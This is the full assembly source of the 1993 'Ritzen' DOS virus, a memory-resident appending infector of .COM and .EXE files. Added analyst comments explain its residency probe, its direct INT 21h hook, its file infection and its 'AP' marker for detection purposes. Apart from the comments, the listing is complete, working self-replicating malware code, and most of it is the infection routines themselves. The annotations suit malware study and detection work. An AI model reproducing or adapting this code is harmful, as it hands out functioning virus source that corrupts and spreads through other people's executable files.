;*****************************************************************************
;*                                                                           *
;*                           The Ritzen Virus                                *
;*                                                                           *
;*          (c) '93, by S.A.R. (Students Against Ritzen) / TridenT           *
;*                                                                           *
;*****************************************************************************
; Analyst annotation (comments only, code unchanged):
; - Historical DOS memory-resident appending infector of .COM and .EXE files,
;   MASM/TASM syntax, tiny model, assembled with `org 100h` behind a 3-byte stub.
; - `.radix 16` makes EVERY unsuffixed number in this file hexadecimal:
;   `18 dup (?)` is 24 bytes, `ds:[0010]` is offset 10h, `head_exe+10` is +10h.
; - Behaviour visible in this listing that is useful for detection: the
;   program's own MCB and PSP memory size are shrunk by mem_size paragraphs,
;   the INT 21h vector is written straight into the IVT at 0000:0084h
;   (DOS function 25h is commented out), an "are-you-there" probe
;   (AX=3000h, DX=0AAAAh) is answered with DX=0BBBBh, and infected files end
;   with the marker word virus_id ("AP").

        .model  tiny
        .radix  16                      ; default number base is hexadecimal
        .code

len             equ     offset last - atlantic  ; size of the virus body in bytes
len_para        equ     len /10h                ; ... rounded down to paragraphs
mem_size        equ     60h                     ; paragraphs taken from the top of the host's block

        org     100h
dummy:  db      0e9h,00h,00h            ; carrier stub: a JMP rel16 (E9 xx xx) that the
                                        ; assembled dummy file starts with

;-----------------------------------------------------------------------
; atlantic - entry point reached from the host's patched first bytes.
; In:   DS = ES = host PSP (DOS convention for both COM and EXE)
; Does: BP = (where this copy actually runs) - (where it was assembled),
;       restores the host entry, probes for a resident copy, and installs
;       itself at the top of memory if none answers.
;-----------------------------------------------------------------------
atlantic:
        call    get_ip                  ; AX = BP = return address of this call
        sub     bp,offset atlantic+3    ; BP = relocation delta used for every cs:[x+bp]

rest_host:
        push    ds
        pop     ax
        mov     cs:[segm+bp],ax         ; remember the host PSP for abort_install
        cmp     cs:[type_host+bp],'E'   ; host type byte written at infection time
        je      fix_exe

fix_com:
        lea     si,cs:[com_start+bp]    ; the 3 original bytes saved from the COM host
        mov     ax,es
        inc     ax
        mov     es,ax                   ; ES = PSP+1, so ES:00F0h addresses PSP:0100h
        mov     di,00F0h
        mov     cx,03h
        rep     movsb                   ; put the original bytes back at PSP:0100h
        mov     ax,es
        dec     ax
        mov     es,ax                   ; ES = PSP again
        mov     ax,0100h
        push    cs                      ; far return address CS:0100h for end_install
        push    ax
        jmp     chk_resident

fix_exe:
        mov     ax,cs:[exe_cs+bp]       ; original header CS (saved by inf_exe)
        mov     bx,ax
        mov     ax,ds                   ; PSP segment ...
        add     ax,bx
        add     ax,10h                  ; ... + header CS + 10h (PSP size) = real CS
        push    ax
        mov     bx,cs:[exe_ip+bp]       ; original header IP
        push    bx                      ; far return address for end_install

chk_resident:
        mov     dx,0aaaah               ; "are you there?" probe answered by mine_i21h
        mov     ax,3000h
        int     21h
        cmp     dx,0bbbbh
        je      end_install             ; already resident: just run the host

mem_install:
        push    ds                      ; keep the host PSP segment
        push    ds
        pop     ax
        dec     ax                      ; DS = PSP-2 instead of PSP-1, so the MCB is
        dec     ax                      ; addressed at offset 10h (the author's comment
        push    ax                      ; says this is to fool heuristic scanners)
        pop     ds
        cmp     byte ptr ds:[0010],5ah  ; (PSP-1):0 == 'Z': is this the last MCB?
        jne     abort_install           ; if not, do not go resident
        mov     ax,ds:[0013]            ; (PSP-1):3 = block size in paragraphs
        sub     ax,mem_size
        mov     ds:[0013],ax            ; shrink the block by mem_size paragraphs
        pop     ds                      ; DS = host PSP again
        sub     word ptr ds:[0002],mem_size ; PSP top-of-memory field must agree with the MCB
                                        ; (falls through to vir_install with AX = new size)
vir_install:
        xchg    ax,bx                   ; BX = reduced block size in paragraphs
        mov     ax,es                   ; ES = host PSP
        add     ax,bx                   ; AX = PSP + size = segment of the freed top area
        mov     es,ax
        mov     cs:[vir_seg+bp],ax      ; the resident copy lives here
        push    cs
        pop     ds
        lea     si,[atlantic+bp]        ; source: the copy that is running now
        lea     di,es:0103h             ; destination offset 103h mirrors the assembled
        mov     cx,len                  ; layout (org 100h + 3-byte stub): no offset fix-ups
copy:
        movsb
        dec     cx
        jnz     copy
        push    ds
        pop     es

hook_i21h:
        cli
        mov     ax,3521h                ; get current INT 21h vector -> ES:BX
        int     21h
        mov     ds,cs:[vir_seg+bp]
        mov     [i21h],bx               ; store it in the RESIDENT copy's data
        mov     [i21h+2],es
        ; mov dx, offset ds:[mine_i21h]
        ; mov ax,2525h
        ; int 21h
        mov     ax,ds                   ; DOS set-vector (commented out above) is not used;
        mov     bx,ax                   ; the IVT entry 0000:0084h is written directly,
        mov     dx, offset ds:[mine_i21h]   ; a pattern behaviour blockers key on
        xor     ax,ax
        mov     ds,ax
        mov     ds:[4*21h],dx
        mov     ds:[4*21h+2],bx
        sti

abort_install:
        mov     ax,cs:[segm+bp]         ; DS = ES = host PSP before returning to it
        push    ax
        pop     es
        push    es
        pop     ds
end_install:
        retf                            ; far return to the CS:IP pushed in fix_com / fix_exe

;*************************************************************************
;*                                                                       *
;*              I N T E R R U P T   H A N D L E R                        *
;*                                                                       *
;*************************************************************************

; INT 24h (critical error) replacement: answer AL=3 (fail) so an I/O error
; during infection never shows the DOS "Abort, Retry, Fail?" prompt.
mine_i24h:
        mov     al,03h
        iret

; INT 21h hook. Entry registers are the caller's: AX = function, and for the
; two functions inspected below DS:DX = ASCIIZ filename.
mine_i21h:
        pushf
        cmp     ax,3000h                ; residency probe: AX=3000h, DX=0AAAAh
        jne     new_21h
        cmp     dx,0aaaah
        jne     new_21h
        mov     dx,0bbbbh               ; reply DX=0BBBBh (also usable as a detection probe)
        popf
        iret

new_21h:
        push    ax                      ; preserve caller state
        push    bx
        push    cx
        push    dx
        push    ds
        push    es
        push    di
        push    si
chk_open:
        xchg    ax,bx
        cmp     bh,3dh                  ; AH=3Dh: open file
        je      chk_com
chk_exec:
        cmp     bx,04b00h               ; AX=4B00h: load and execute
        je      chk_com

continu:
        pop     si                      ; restore caller state
        pop     di
        pop     es
        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax
next:
        popf
        jmp     dword ptr cs:[i21h]     ; chain to the saved original vector

;**************************************************************************
;*                                                                        *
;*              C H E C K   C O M / E X E   F I L E                       *
;*                                                                        *
;**************************************************************************
; Scans at most 0FFh bytes of the filename in DS:DX for '.', then matches the
; extension as two words. MASM stores a two-character literal high char first,
; so word 'OC' is the bytes "CO" and 'M' is "M",0: the tests below accept
; exactly "COM",0 and "EXE",0 after the first '.'.
chk_com:
        mov     cs:[name_seg],ds        ; remember the name for open_file / set_atributes
        mov     cs:[name_off],dx
        cld
        mov     cx,0ffh
        push    ds
        pop     es
        push    dx
        pop     di
        mov     al,'.'
        repne   scasb                   ; DI -> byte after the first '.'
        cmp     word ptr es:[di],'OC'
        jne     chk_exe
        cmp     word ptr es:[di+2],'M'
        jne     continu
        jmp     infect_com
chk_exe:
        cmp     word ptr es:[di],'XE'
        jne     continu
        cmp     word ptr es:[di+2],'E'
        jne     continu
        jmp     infect_exe

;**************************************************************************
;*                                                                        *
;*              I N F E C T   C O M - F I L E                             *
;*                                                                        *
;**************************************************************************
; Appending COM infection: save the first 3 host bytes into com_start, write
; E9h + (size-3) at offset 0, append the body.
infect_com:
        call    init                    ; hook INT 24h, open, attributes, date, marker check
        cmp     cs:[fout],0ffh          ; init failed or file already carries the marker
        je      close_file
        mov     cs:[type_host],'C'
        mov     ax,4200h                ; lseek(handle, 0, from start)
        call    mov_point
        mov     cx,03h
        mov     ah,3fh                  ; read 3 bytes -> com_start
        lea     dx,cs:[com_start]
        call    do_int21h
        mov     ax,4200h
        call    mov_point
        mov     ax,4202h                ; lseek(handle, 0, from end): AX = low word of size
        call    mov_point
        sub     ax,03h                  ; JMP rel16 is relative to the byte after E9 xx xx
        mov     cs:[lenght_file],ax
        call    write_jmp
        call    write_vir
        call    save_date               ; see note at save_date: this reads, it does not restore
close_file:
        mov     bx,cs:[handle]
        mov     ah,3eh                  ; close
        call    do_int21h
restore_int24h:
        mov     dx,cs:[i24h]            ; put the original critical-error handler back
        mov     ds,cs:[i24h+2]
        mov     ax,2524h
        call    do_int21h
        jmp     continu

;**************************************************************************
;*                                                                        *
;*              I N F E C T   E X E - F I L E                             *
;*                                                                        *
;**************************************************************************
infect_exe:
        call    init
        cmp     cs:[fout],0ffh
        je      close_file
        mov     cs:[type_host],'E'
        mov     ax,4200h
        call    mov_point
        mov     ah,3fh                  ; read the 18h-byte (24-byte) EXE header
        mov     cx,18h
        lea     dx,[head_exe]
        call    do_int21h
        call    inf_exe
        call    save_date
        jmp     close_file

;**************************************************************************
;*                                                                        *
;*              R O U T I N E S                                           *
;*                                                                        *
;**************************************************************************

; get_ip - returns AX = BP = this call's return address (the offset of the
; instruction following `call get_ip` in the running copy).
; NOTE(review): `push sp` / `pop bx` leaves BX = SP before the push only with
; 80286+ semantics; behaviour on an 8086 is not handled here.
get_ip:
        push    sp
        pop     bx                      ; BX = address of the return IP on the stack
        mov     ax, word ptr cs:[bx]
        mov     bp,ax
        ret

; init - common infection prologue. Sets fout = 0FFh when the open fails
; (CF) or the file already ends with the marker (ZF from chk_infect).
init:
        mov     cs:[fout],00h
        call    int24h
        call    open_file
        jc      error
        call    set_atributes
        call    get_date
        call    chk_infect
        je      error                   ; marker present: already infected
        ret
error:
        mov     cs:[fout],0ffh
        ret

; int24h - save the current INT 24h vector in i24h and point it at mine_i24h.
int24h:
        push    cs
        pop     ds
        mov     ax,3524h                ; get vector -> ES:BX
        call    do_int21h
        mov     cs:[i24h],bx
        mov     cs:[i24h+2],es
        mov     dx, offset mine_i24h    ; DS:DX = replacement handler
        mov     ax,2524h
        call    do_int21h
        ret

; mov_point - lseek helper. Caller sets AX (4200h = from start, 4202h = from
; end); offset CX:DX = 0, BX = handle. DOS returns DX:AX = new position.
mov_point:
        push    cs
        pop     ds
        mov     bx,cs:[handle]
        xor     cx,cx
        xor     dx,dx
        call    do_int21h
        ret

; open_file - open DS:DX = saved filename for read/write. CF from DOS is left
; untouched for init's `jc error`; AX (handle, or error code) goes to handle.
open_file:
        mov     ds,cs:[name_seg]
        mov     dx,cs:[name_off]
        mov     ax,3d02h                ; open, read/write access
        call    do_int21h
        mov     cs:[handle],ax
        mov     bx,ax
        ret

; set_atributes - ends with AX=4301h (set file attributes of DS:DX to CX).
; NOTE(review): the first call uses AX=4200h, the lseek subfunction, so CX is
; not reloaded from the file's attribute byte before `and cl,0feh`.
set_atributes:
        mov     ax,4200h
        mov     ds,cs:[name_seg]
        mov     dx,cs:[name_off]
        call    do_int21h
        and     cl,0feh                 ; clear bit 0 (read-only) of whatever CX holds
        mov     ax,4301h
        call    do_int21h
        ret

; get_date - read the file's date/time (AX=5700h -> DX = date, CX = time).
get_date:
        mov     bx,cs:[handle]
        mov     ax,5700h
        call    do_int21h
        mov     cs:[date],dx
        mov     cs:[time],cx
        ret

; chk_infect - read the last 2 bytes of the file into file_id and compare
; them with virus_id. Returns ZF = 1 when the marker is present.
chk_infect:
        push    cs
        pop     ds
        mov     ax,4202h                ; lseek(handle, -2, from end): CX:DX = 0FFFFh:0FFFEh
        xor     cx,cx
        sub     cx,01h                  ; CX = -1 built arithmetically instead of as a literal
        xor     dx,dx
        sub     dx,02h                  ; DX = -2
        mov     bx,cs:[handle]
        call    do_int21h
        mov     ah,3fh
        mov     cx,02h
        lea     dx,cs:[file_id]
        call    do_int21h
        mov     al, byte ptr cs:[file_id]
        mov     ah, byte ptr cs:[file_id]+1
        cmp     ax,[virus_id]           ; DS = CS here
        ret

; write_jmp - overwrite the host's first 3 bytes with 0E9h and lenght_file
; (a JMP rel16 to the appended body).
write_jmp:
        push    cs
        pop     ds
        mov     ax,4200h
        call    mov_point
        mov     ah,40h
        mov     cx,01h
        lea     dx,cs:[jump]            ; 1 byte: 0E9h
        call    do_int21h
        mov     ah,40h
        mov     cx,02h
        lea     dx,cs:[lenght_file]     ; 2 bytes: displacement
        call    do_int21h
        ret

; write_vir - append len bytes from CS:0103h (the resident image of
; `atlantic`, see vir_install) to the end of the file.
write_vir:
        push    cs
        pop     ds
        mov     ax,4202h
        call    mov_point
        mov     ah,40h
        mov     cx,len
        mov     dx,103h
        call    do_int21h
        ret

; save_date - NOTE(review): AX=5700h is the GET date/time subfunction, the
; same one get_date uses; the values are stored again and nothing in this
; listing writes them back to the file, so an infected file keeps the
; modification time DOS assigns at close (an on-disk indicator).
save_date:
        mov     ax,5700h
        call    do_int21h
        mov     cs:[date],dx
        mov     cs:[time],cx
        ret

; inf_exe - EXE infection. Header offsets used (hex): 02 bytes in last page,
; 04 page count, 08 header size in paragraphs, 0E initial SS, 10 initial SP,
; 14 initial IP, 16 initial CS.
inf_exe:
        mov     ax,word ptr cs:[head_exe+14h]   ; save original IP
        mov     cs:[exe_ip],ax
        mov     ax, word ptr cs:[head_exe+16h]  ; save original CS
        mov     cs:[exe_cs],ax
        mov     ax,4200h
        call    mov_point
        mov     ax,4202h                ; DX:AX = current file size
        call    mov_point
        mov     bx,10h
        div     bx                      ; AX = size / 16 (paragraphs), DX = size mod 16
        sub     ax, word ptr cs:[head_exe+08h]  ; minus header paragraphs = new CS
        mov     cs:[new_cs],ax
        mov     cs:[new_ip],dx          ; new IP = remainder
        call    write_vir               ; append the body at the old end of file
        mov     ax,4200h
        call    mov_point
        mov     ax,4202h                ; DX:AX = new file size
        call    mov_point
        mov     bx,0200h
        div     bx                      ; AX = full 512-byte pages, DX = bytes in last page
        cmp     dx,0000h
        jne     not_zero
        jmp     zero
not_zero:
        inc     ax                      ; a partial last page counts as a page
zero:
        mov     word ptr cs:[head_exe+02h],dx
        mov     word ptr cs:[head_exe+04h],ax
        mov     ax,cs:[new_ip]
        mov     word ptr cs:[head_exe+14h],ax   ; entry point -> virus body
        mov     ax,cs:[new_cs]
        mov     word ptr cs:[head_exe+16h],ax
        mov     word ptr cs:[head_exe+0Eh],ax   ; initial SS = virus segment too
        add     word ptr cs:[head_exe+10],len_para  ; +10h (radix 16) = initial SP, raised by len_para
        ; mov word ptr cs:[head_exe+10],1000
        mov     ax,4200h
        call    mov_point
        mov     ah,40h
        mov     bx,cs:[handle]
        mov     cx,18h                  ; write the patched 24-byte header back
        lea     dx,cs:[head_exe]
        call    do_int21h
        ret

; do_int21h - call the ORIGINAL INT 21h vector saved in i21h (pushf + far
; call emulates INT), bypassing this hook and anything installed after it.
do_int21h:
        pushf
        call    dword ptr cs:[i21h]
        ret

;****************************************************************************
;*                                                                          *
;*                               D A T A                                    *
;*                                                                          *
;****************************************************************************
type_host       db      'C'             ; 'C' or 'E': how rest_host restores the host
com_start       db      0cdh,20h,90h    ; original first 3 bytes of a COM host
                                        ; (assembled default: INT 20h / NOP)
message         db      " Dedicated to Ritzen, our Minister of Education and Science."
                db      " We are getting sick of your budget cuts so we hope that"
                db      " you get sick of this virus.."
                db      " (c) '93 by S.A.R. / TridenT ."
exe_cs          dw      ?               ; original EXE header CS / IP
exe_ip          dw      ?
new_cs          dw      ?               ; patched EXE header CS / IP
new_ip          dw      ?
vir_seg         dw      ?               ; segment of the resident copy
i21h            dw      00h,00h         ; saved original INT 21h vector (offset, segment)
i24h            dw      00h,00h         ; saved original INT 24h vector (offset, segment)
name_seg        dw      ?               ; DS:DX of the filename being opened / executed
name_off        dw      ?
lenght_file     dw      ?               ; COM: JMP displacement (size - 3)
head_exe        db      18 dup (?)      ; 18h = 24 bytes of EXE header
handle          dw      ?
fout            db      ?               ; 0FFh when init failed ("fout" = Dutch for error)
file_id         dw      ?               ; last 2 bytes of the file read by chk_infect
jump            db      0e9h            ; JMP rel16 opcode written by write_jmp
date            dw      ?               ; file date / time read by get_date and save_date
time            dw      ?
segm            dw      ?               ; host PSP segment
virus_id        dw      "AP"            ; infection marker: the body's last word
                                        ; (MASM stores it high char first, bytes "P","A")
last            dw      "AP"            ; end-of-body label; not included in len
        end     dummy